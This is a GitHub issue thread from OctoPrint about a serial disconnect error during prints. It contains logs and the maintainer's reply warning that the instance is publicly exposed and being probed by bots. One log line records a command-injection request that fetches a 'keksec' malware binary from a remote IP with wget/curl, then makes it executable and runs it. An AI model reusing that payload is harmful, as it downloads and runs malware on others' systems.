OctoPrint/OctoPrint #3967: Offline (Error: SerialException: 'device reports readiness to read but returned no data (device disconnected or multiple access on port?)'

martinglass, 2021-01-17:
#### What were you doing?
Printing a gcode to my Prusa Mk3/S

#### What did you expect to happen?
Print to work

#### What happened instead?
The print starts, the machine homes and does the bed levelling, but then halts immediately afterwards, with the following error report: 
"Offline (Error: SerialException: 'device reports readiness to read but returned no data (device disconnected or multiple access on port?)' @ comm.py:_readline:3831)"

#### Did the same happen when running OctoPrint in safe mode?
Haven't tried safe mode yet.

#### Version of OctoPrint
1.5.2

#### Operating System running OctoPrint
OctoPi

#### Printer model & used firmware incl. version
Prusa MK3/S

#### Browser and version of browser, operating system running browser
Safari (Mac)

#### Link to octoprint.log

2021-01-17 08:48:18,972 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 08:48:32,680 - octoprint.util.comm - INFO - Printer reports firmware name "Prusa-Firmware 3.9.1 based on Marlin"
2021-01-17 08:48:35,063 - octoprint.server.preemptive_cache - INFO - ... done in 17.24s
2021-01-17 08:48:47,749 - octoprint.util.comm - INFO - Telling the printer to set the busy interval to our "communicationBusy" timeout - 1s = 2s
2021-01-17 09:03:18,978 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 09:18:18,981 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 09:20:50,864 - tornado.access - WARNING - 404 HEAD http://112.124.42.80:63435/ (::ffff:60.191.125.35) 26.19ms
2021-01-17 09:33:18,983 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 09:48:18,985 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 10:03:18,988 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 10:18:18,992 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 10:33:18,994 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 10:48:18,997 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 11:03:18,999 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 11:14:24,365 - tornado.access - WARNING - 404 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http://107.174.133.119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http://107.174.133.119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' (::ffff:139.59.94.33) 21.36ms
2021-01-17 11:18:19,002 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 11:33:19,005 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 11:48:19,007 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 12:03:19,009 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 12:18:19,010 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 12:26:21,128 - tornado.access - WARNING - 404 GET /sitemap.xml (::ffff:71.6.167.142) 15.59ms
2021-01-17 12:26:21,618 - tornado.access - WARNING - 404 GET /.well-known/security.txt (::ffff:71.6.167.142) 16.69ms
2021-01-17 12:33:19,013 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 12:35:03,652 - octoprint.server.util.flask - INFO - Passively logging in user xxx from ::ffff:xx.xx.xx.xx
2021-01-17 12:35:03,657 - octoprint.access.users - INFO - Logged in user: xxx
2021-01-17 12:35:09,239 - octoprint.server.util.sockjs - INFO - New connection from client: ::ffff:xx.xx.xx.xx
2021-01-17 12:35:09,435 - octoprint.server.util.flask - INFO - Passively logging in user xxx from ::ffff:xx.xx.xx.xx
2021-01-17 12:35:09,437 - octoprint.access.users - INFO - Logged in user: xxx
2021-01-17 12:35:09,873 - octoprint.plugins.softwareupdate - INFO - Fetching check overlays from https://plugins.octoprint.org/update_check_overlay.json
2021-01-17 12:35:17,268 - octoprint.plugins.pluginmanager - INFO - Loaded plugin repository data from https://plugins.octoprint.org/plugins.json
2021-01-17 12:35:19,642 - octoprint.plugins.pluginmanager - INFO - Loaded plugin notices data from https://plugins.octoprint.org/notices.json
2021-01-17 12:35:22,734 - octoprint.util.pip - INFO - Using "/home/pi/oprint/bin/python2 -m pip" as command to invoke pip
2021-01-17 12:35:22,737 - octoprint.util.pip - INFO - pip installs to /home/pi/oprint/lib/python2.7/site-packages (writable -> yes), --user flag needed -> no, virtual env -> yes
2021-01-17 12:35:22,738 - octoprint.util.pip - INFO - ==> pip ok -> yes
2021-01-17 12:35:23,006 - octoprint.plugins.softwareupdate - INFO - Saved version cache to disk
2021-01-17 12:35:23,812 - octoprint.server.util.sockjs - INFO - User xxx logged in on the socket from client ::ffff:xx.xx.xx.xx
2021-01-17 12:36:40,641 - octoprint.server.util.sockjs - INFO - New connection from client: ::ffff:xx.xx.xx.xx
2021-01-17 12:36:45,306 - octoprint.server.util.sockjs - INFO - Client connection closed: ::ffff:xx.xx.xx.xx
2021-01-17 12:48:19,016 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 13:03:19,019 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 13:18:19,023 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 13:33:19,028 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 13:38:18,318 - octoprint.filemanager.analysis - INFO - Starting analysis of local:Top_0.2mm_PETG_MK3S_1h17m.gcode
[... 69 lines cut ...]
  File "/home/pi/oprint/local/lib/python2.7/site-packages/octoprint/util/comm.py", line 3831, in _readline
    ret = self._serial.readline()
  File "/home/pi/oprint/local/lib/python2.7/site-packages/octoprint/util/comm.py", line 6455, in readline
    c = self.read(1)
  File "/home/pi/oprint/local/lib/python2.7/site-packages/serial/serialposix.py", line 501, in read
    'device reports readiness to read but returned no data '
SerialException: device reports readiness to read but returned no data (device disconnected or multiple access on port?)
2021-01-17 13:45:26,084 - octoprint.util.comm - ERROR - Please see https://faq.octoprint.org/serialerror for possible reasons of this.
2021-01-17 13:45:26,147 - octoprint.util.comm - INFO - Changing monitoring state from "Printing" to "Offline (Error: SerialException: 'device reports readiness to read but returned no data (device disconnected or multiple access on port?)' @ comm.py:_readline:3831)"
2021-01-17 13:45:26,188 - octoprint.plugins.action_command_notification - INFO - Notifications cleared
2021-01-17 13:45:27,937 - octoprint.plugins.ipOnConnect - INFO - ipOnConnectPlugin: M117 xx.xx.xx.xx
2021-01-17 13:46:15,964 - octoprint.server.util.sockjs - INFO - Client connection closed: fe80::98:b6bd:b017:d40
2021-01-17 13:46:16,556 - octoprint.server.util.sockjs - INFO - New connection from client: ::ffff:xx.xx.xx.xx
2021-01-17 13:46:16,584 - tornado.access - WARNING - 409 GET /api/printer (::ffff:xx.xx.xx.xx) 12.39ms
2021-01-17 13:46:16,805 - octoprint.server.util.flask - INFO - Passively logging in user _api from ::ffff:xx.xx.xx.xx
2021-01-17 13:46:16,808 - octoprint.access.users - INFO - Logged in user: _api
2021-01-17 13:46:16,872 - octoprint.server.util.sockjs - INFO - User _api logged in on the socket from client ::ffff:xx.xx.xx.xx
2021-01-17 13:48:19,030 - octoprint.server.heartbeat - INFO - Server heartbeat <3
2021-01-17 13:48:59,640 - octoprint.server.util.sockjs - INFO - Client connection closed: ::ffff:xx.xx.xx.xx
2021-01-17 13:49:00,758 - octoprint.server.util.sockjs - INFO - New connection from client: fe80::98:b6bd:b017:d40
2021-01-17 13:49:00,928 - tornado.access - WARNING - 409 GET /api/printer (fe80::98:b6bd:b017:d40) 11.81ms
2021-01-17 13:49:00,954 - octoprint.server.util.flask - INFO - Passively logging in user _api from fe80::98:b6bd:b017:d40
2021-01-17 13:49:00,957 - octoprint.access.users - INFO - Logged in user: _api
2021-01-17 13:49:00,995 - octoprint.server.util.sockjs - INFO - User _api logged in on the socket from client fe80::98:b6bd:b017:d40
2021-01-17 13:51:22,700 - octoprint.server.util.sockjs - INFO - Client connection closed: fe80::98:b6bd:b017:d40

KennyVDL, 2021-01-18:
This is the Serial Log

2021-01-18 14:24:58,181 - serial.log is currently not enabled, you can enable it via Settings > Serial Connection > Log communication to serial.log
2021-01-18 14:28:13,170 - Enabling serial logging
2021-01-18 14:28:13,803 - Recv:  T:18.87 /0.00 B:18.91 /0.00 @:0 B@:0
2021-01-18 14:28:15,733 - Recv:  T:18.75 /0.00 B:19.10 /0.00 @:0 B@:0
2021-01-18 14:28:17,733 - Recv:  T:18.71 /0.00 B:18.79 /0.00 @:0 B@:0
2021-01-18 14:28:19,733 - Recv:  T:18.59 /0.00 B:18.87 /0.00 @:0 B@:0
2021-01-18 14:28:21,734 - Recv:  T:18.83 /0.00 B:19.02 /0.00 @:0 B@:0
2021-01-18 14:28:22,806 - Send: M140 S60
2021-01-18 14:28:22,826 - Recv: ok
2021-01-18 14:28:23,733 - Recv:  T:19.14 /0.00 B:19.14 /60.00 @:0 B@:127
2021-01-18 14:28:25,733 - Recv:  T:18.67 /0.00 B:18.83 /60.00 @:0 B@:127
2021-01-18 14:28:27,733 - Recv:  T:18.63 /0.00 B:18.98 /60.00 @:0 B@:127
2021-01-18 14:28:29,732 - Recv:  T:18.91 /0.00 B:18.98 /60.00 @:0 B@:127
2021-01-18 14:28:31,732 - Recv:  T:18.40 /0.00 B:19.22 /60.00 @:0 B@:127
2021-01-18 14:28:33,733 - Recv:  T:18.48 /0.00 B:19.02 /60.00 @:0 B@:127
2021-01-18 14:28:35,733 - Recv:  T:18.59 /0.00 B:18.83 /60.00 @:0 B@:127
2021-01-18 14:28:37,733 - Recv:  T:18.55 /0.00 B:19.26 /60.00 @:0 B@:127
2021-01-18 14:28:39,738 - Recv:  T:19.06 /0.00 B:18.87 /60.00 @:0 B@:127
2021-01-18 14:28:41,733 - Recv:  T:18.98 /0.00 B:18.87 /60.00 @:0 B@:127
2021-01-18 14:28:43,732 - Recv:  T:18.87 /0.00 B:18.75 /60.00 @:0 B@:127
2021-01-18 14:28:45,732 - Recv:  T:18.91 /0.00 B:18.98 /60.00 @:0 B@:127
2021-01-18 14:28:47,731 - Recv:  T:18.67 /0.00 B:18.91 /60.00 @:0 B@:127
2021-01-18 14:28:49,731 - Recv:  T:18.55 /0.00 B:19.10 /60.00 @:0 B@:127
2021-01-18 14:28:51,731 - Recv:  T:18.52 /0.00 B:18.98 /60.00 @:0 B@:127
2021-01-18 14:28:53,731 - Recv:  T:18.75 /0.00 B:19.02 /60.00 @:0 B@:127
2021-01-18 14:28:55,732 - Recv:  T:18.44 /0.00 B:18.87 /60.00 @:0 B@:127
2021-01-18 14:28:57,730 - Recv:  T:18.71 /0.00 B:18.79 /60.00 @:0 B@:127
2021-01-18 14:28:59,731 - Recv:  T:18.55 /0.00 B:18.79 /60.00 @:0 B@:127
2021-01-18 14:29:01,731 - Recv:  T:18.44 /0.00 B:19.02 /60.00 @:0 B@:127
2021-01-18 14:29:03,730 - Recv:  T:18.63 /0.00 B:18.91 /60.00 @:0 B@:127
2021-01-18 14:29:05,730 - Recv:  T:18.55 /0.00 B:18.91 /60.00 @:0 B@:127
2021-01-18 14:29:07,730 - Recv:  T:18.59 /0.00 B:18.75 /60.00 @:0 B@:127
2021-01-18 14:29:09,730 - Recv:  T:18.48 /0.00 B:18.48 /60.00 @:0 B@:127
2021-01-18 14:29:11,729 - Recv:  T:18.83 /0.00 B:18.67 /60.00 @:0 B@:127
2021-01-18 14:29:13,729 - Recv:  T:18.87 /0.00 B:18.87 /60.00 @:0 B@:127
2021-01-18 14:29:15,728 - Recv:  T:18.52 /0.00 B:18.67 /60.00 @:0 B@:127
2021-01-18 14:29:17,729 - Recv:  T:18.63 /0.00 B:18.87 /60.00 @:0 B@:127
2021-01-18 14:29:19,729 - Recv:  T:18.63 /0.00 B:19.14 /60.00 @:0 B@:127
2021-01-18 14:29:21,727 - Recv:  T:18.55 /0.00 B:18.95 /60.00 @:0 B@:127
2021-01-18 14:29:22,964 - Recv: Error:Heating failed, system stopped! Heater_ID: bed
2021-01-18 14:29:22,976 - Recv: Error:Printer halted. kill() called!
2021-01-18 14:29:22,984 - Changing monitoring state from "Operational" to "Error: Heating failed, system stopped! Heater_ID: bed - Printer halted. kill() called!"
2021-01-18 14:29:23,007 - Send: M112
2021-01-18 14:29:23,009 - Send: N3 M112*34
2021-01-18 14:29:23,013 - Send: N4 M104 T0 S0*37
2021-01-18 14:29:23,014 - Send: N5 M140 S0*96
2021-01-18 14:29:23,038 - Changing monitoring state from "Error: Heating failed, system stopped! Heater_ID: bed - Printer halted. kill() called!" to "Offline (Error: Heating failed, system stopped! Heater_ID: bed - Printer halted. kill() called!)"
2021-01-18 14:29:23,049 - Connection closed, closing down monitor

foosel, 2021-01-25:
First of all:

> 404 GET /.well-known/security.txt (::ffff:71.6.167.142) 16.69ms

Your OctoPrint instance is publicly reachable from the internet and being probed by bots to break in. Fix this ASAP. This is utterly unrecommended. There are currently no known attack vectors in OctoPrint, but that can always change, 0-days are no fun, an owned network ain't either and even if no one breaks in every script kiddie can easily perform a denial of service attack on your instance if it's publicly available on the net and disrupt or destroy your jobs through that (if your instance is busy reacting to thousands of bogus network packets, it can't drive a printer anymore).

Then, about your actual problem, have you read the [FAQ entry linked in the error message](https://faq.octoprint.org/serialerror)? As outlined there, there is nothing that OctoPrint can do about this error, it happens underneath it. You are welcome to get in touch on the Community Forums in order to help you analyse what might be going on, but there's nothing that I can do here.

Also, next time please try safe mode (wouldn't help here, but might with other issues) and share the *full* octoprint.log, the one above is abridged.

closed 2021-01-25 by foosel